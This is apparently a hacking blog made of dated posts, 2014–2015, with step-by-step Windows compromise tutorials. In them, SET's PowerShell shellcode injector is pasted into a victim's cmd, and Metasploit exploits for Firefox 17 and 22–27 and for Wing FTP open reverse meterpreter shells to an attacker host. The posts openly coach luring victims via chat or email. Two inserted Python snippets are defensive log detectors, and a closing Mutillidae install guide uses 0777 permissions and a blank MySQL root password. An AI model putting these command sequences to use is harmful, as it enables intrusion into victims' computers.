Thursday 17 September 2015

Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus).





The Powershell Attack Vector module allows you to create PowerShell-specific attacks. These attacks use PowerShell, which is available by default on all Windows operating systems from Vista onward. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database 

Here we are using the Powershell Alphanumeric Shellcode Injector technique.

-: Requirements :-
   Attacker :- setoolkit
   Victim :- PowerShell and Windows OS

-: Steps :-
1. Open a terminal, type 'setoolkit' and hit Enter. You will see the following in your terminal.

2. Now choose 1, “Social-Engineering Attacks”.

3. Now choose 10, “Powershell Attack Vector”.

4. Now choose 1, “Powershell Alphanumeric Shellcode Injector”, and type the IP address and port number of your PC for the reverse connection.

5. Press Enter; SET will start the Metasploit payload handler service.

6. Now retrieve the PowerShell code that SET created. The code is saved in /root/.set/reports/powershell/x64_powershell_injection.txt. Copy that file to the Desktop and send it to the victim.

7. Send the code, or send that text file, and tell the victim to copy and paste the code into Command Prompt.

8. When the victim pastes the code into cmd and presses Enter, after a few seconds the command prompt will close and we will get a meterpreter shell in msfconsole. :)

9. Now type "sessions -l" to get the list of sessions.

10. Now type "sessions -i ID" and hit Enter. You will get a meterpreter shell; then type meterpreter commands to carry out your activity, e.g. shell to start and access the command prompt.



 That's it 
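For defenders, the one-liner pasted in steps 7 and 8 shows up in process-creation logs when command-line auditing is enabled. The following Python is an added example, not SET's code or part of the original post: it assumes the launcher starts powershell with an encoded command (optionally with a hidden window), and the event layout and sample events are constructed.

```python
import base64

def _flag_matches(token, full_name, aliases=()):
    """PowerShell accepts any prefix of a parameter name (-e, -enc, -w, -win)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return full_name.startswith(name) or name in aliases

def inspect_cmdline(cmdline):
    """Return a finding for an encoded PowerShell launch, else None."""
    if "powershell" not in cmdline.lower():
        return None
    tokens = cmdline.split()
    hidden, decoded = False, None
    for tok, nxt in zip(tokens, tokens[1:] + [""]):
        if _flag_matches(tok, "encodedcommand", ("ec",)) and nxt:
            try:  # -EncodedCommand carries base64 of UTF-16LE text
                decoded = base64.b64decode(nxt, validate=True).decode("utf-16-le")
            except ValueError:
                decoded = "<not valid base64/UTF-16LE>"
        elif _flag_matches(tok, "windowstyle") and nxt.lower() in ("hidden", "1"):
            hidden = True
    if decoded is None:
        return None
    return {"hidden_window": hidden, "decoded": decoded}

def scan(events):
    """events: (parent_image, command_line) pairs from process-creation logs."""
    hits = []
    for parent, cmdline in events:
        finding = inspect_cmdline(cmdline)
        if finding:
            finding["from_cmd"] = parent.lower().endswith("cmd.exe")
            hits.append(finding)
    return hits

# Constructed sample events; the encoded text is a harmless placeholder.
_B64 = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\cmd.exe", "powershell -nop -win hidden -noni -enc " + _B64),
    (r"C:\Windows\explorer.exe", r"powershell.exe -File C:\lab\inventory.ps1"),
    (r"C:\Windows\System32\cmd.exe", "ipconfig /all"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Decoding the argument as UTF-16LE gives the analyst the script text that actually ran, which is what matters for triage.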


Tuesday 17 February 2015

How to exploit Remote Windows PC using Firefox XML Serializer Use After Free



This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.


Exploit Targets :
Firefox 17.0.1 or lower
Windows XP SP3

Requirements:

Attacker: Kali or BackTrack Linux
Victim PC: Windows XP

Steps:
1. Open a terminal and type msfconsole

2. Now type use exploit/windows/browser/mozilla_firefox_xmlserializer

3. msf exploit (mozilla_firefox_xmlserializer)>set payload windows/meterpreter/reverse_tcp

4. msf exploit (mozilla_firefox_xmlserializer)>set lhost 192.168.1.136 (IP of Local Host)

5. msf exploit (mozilla_firefox_xmlserializer)>set srvhost 192.168.1.136 (IP of Local Host)

6. msf exploit (mozilla_firefox_xmlserializer)>set uripath /

7. msf exploit (mozilla_firefox_xmlserializer)>exploit

8. Now the URL you should give to your victim is http://192.168.1.136:8080/

Sunday 14 September 2014

How to Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection ??



This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs.

Exploit Targets:-
Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement:-
Attacker: Kali Linux

Victim PC: Windows 7





*steps* 

1. Open a Kali terminal and type

     msfconsole

2. Now type

    use exploit/multi/browser/firefox_webidl_injection

3. msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

4. msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

5. msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

6. msf exploit (firefox_webidl_injection)>set uripath /

7. msf exploit (firefox_webidl_injection)>exploit

8. Now the URL you should give to your victim is http://192.168.0.5:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session. Now type “sessions -i ID”.
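Both Firefox write-ups above name the browser versions they apply to (17.0 below 17.0.2, and 22-27), so a defender can triage web or proxy logs for clients still running them. The following Python is an added example, not part of the original posts or of Metasploit; the log layout, addresses and label names are constructed, and the handling of a bare "17.0" is an assumption noted in the code.

```python
import re

FIREFOX_RE = re.compile(r"Firefox/(\d+(?:\.\d+)*)")

def firefox_version(user_agent):
    """Return the Firefox version in a User-Agent as a tuple of ints, or None."""
    match = FIREFOX_RE.search(user_agent)
    return tuple(int(p) for p in match.group(1).split(".")) if match else None

def classify(user_agent):
    """Map a User-Agent onto the version ranges quoted in the two write-ups."""
    version = firefox_version(user_agent)
    if version is None:
        return "not-firefox"
    if 22 <= version[0] <= 27:
        return "affected-webidl"             # "Firefox 22-27"
    if version[:2] == (17, 0):
        if len(version) < 3:
            # Assumption: a UA reporting only "17.0" hides the patch level,
            # so 17.0.1 and the fixed 17.0.2 cannot be told apart from logs.
            return "verify-xmlserializer"
        if version < (17, 0, 2):
            return "affected-xmlserializer"  # "17.0 (< 17.0.2)"
    return "outside-page-ranges"

def triage(log_lines):
    """Return {client_ip: label} for clients to follow up; UA = last quoted field."""
    result = {}
    for line in log_lines:
        quoted = re.findall(r'"([^"]*)"', line)
        if not quoted:
            continue
        label = classify(quoted[-1])
        if label.startswith(("affected", "verify")):
            result[line.split()[0]] = label
    return result

# Constructed access-log lines (documentation addresses, made-up requests).
_LINE = ('{ip} - - [17/Feb/2015:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
         '"Mozilla/5.0 (Windows NT 6.1; rv:{v}) Gecko/20100101 Firefox/{v}"')
_CLIENTS = [("192.0.2.10", "17.0"), ("192.0.2.11", "17.0.1"),
            ("192.0.2.12", "25.0"), ("192.0.2.13", "40.0")]
SAMPLE_LOG = [_LINE.format(ip=ip, v=v) for ip, v in _CLIENTS]

if __name__ == "__main__":
    for ip, label in triage(SAMPLE_LOG).items():
        print(ip, label)
```

Clients labelled `verify-xmlserializer` need an inventory check of the installed build, since the log alone cannot confirm the patch level.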

How to Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution ??

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets:-
Wing FTP 4.3.8

Requirements :-
Attacker: Kali Linux, BackTrack Linux

Victim PC: Windows 7

*steps:-*


1. Open a Kali terminal and type

        msfconsole

2. Now type

    use exploit/windows/ftp/wing_ftp_admin_exec

3. msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

4. msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

5. msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

6. msf exploit (wing_ftp_admin_exec)>set username rajchandel

7. msf exploit (wing_ftp_admin_exec)>set password ——–

8. msf exploit (wing_ftp_admin_exec)>exploit


That's it

Wednesday 11 June 2014

How to install Mutillidae in Kali Linux ?

// Intro :-
Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web-security enthusiasts. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMPP. Mutillidae gives you a penetration testing environment where you can check your skills in a legal way. This is an easy-to-use web hacking environment designed for labs, security enthusiasts, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.
  

// Features 

  • Has over 35 vulnerabilities and challenges. Contains at least one vulnerability for each of the OWASP Top Ten 2007 and 2010
  • Actually Vulnerable (User not asked to enter “magic” statement)
  • Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to install or administrate their own webserver. Mutillidae is confirmed to work on XAMPP, WAMP, and LAMP. XAMPP is the "default" deployment.
  • Installs easily by dropping project files into the "htdocs" folder of XAMPP.
  • Will attempt to detect if the MySQL database is available for the user
  • Preinstalled on Rapid7 Metasploitable 2, Samurai Web Testing Framework (WTF), and OWASP Broken Web Apps (BWA)
  • Contains 2 levels of hints to help users get started
  • Includes bubble-hints to help point out vulnerable locations
  • Bubble-hints automatically give more information as the hint level is incremented
  • System can be restored to default with single-click of "Setup" button
  • User can switch between secure and insecure modes
  • Secure and insecure source code for each page stored in the same PHP file for easy comparison
  • Provides data capture page and stores captured data in database and file
  • Allows SSL to be enforced in order to practice SSL stripping
  • Used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability software
  • Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools

// Steps

    1. Download Mutillidae.

    2. Unzip the downloaded file.

    3. Go to Latest-mutillidae-2.6.10 → var → www → mutillidae, then copy the "mutillidae" folder. We will paste this folder into our Kali Linux OS. If your host OS is not shared with your guest OS, you can use a pen drive to move this folder. (If your folder has a different name, rename it to mutillidae.)

    4. In Kali Linux, go to Computer → File system → var → www, then paste the mutillidae folder. Make sure your folder path and folder name are the same as mine.

    5. Set the permissions of mutillidae to 0777. Open a terminal, type
    chmod -R 0777 /var/www/mutillidae
    and press Enter.

    6. Run Apache: go to Application → Kali Linux → System Service → HTTP → apache2 start

    7. Apache runs successfully.

    8. Run MySQL: go to Application → Kali Linux → System Service → MySQL → mysql start

    9. MySQL runs successfully.

    10. Now create the database for Mutillidae
    → Open a terminal
    → Type mysql -u root -p and press Enter
    → When it asks for a password, leave it blank and simply press Enter
    → Now type create database mutillidae; and press Enter
    → Type exit and press Enter

    11. Open your Internet browser, enter 127.0.0.1/mutillidae in the address bar and press Enter. If you have done everything correctly you will get the Mutillidae interface. Now click on Reset DB.

    12. Click OK

    14. Done

    Note - You have to repeat Step 7 - Step 10 each time you restart your Kali Linux; only then will 127.0.0.1/mutillidae work in your browser.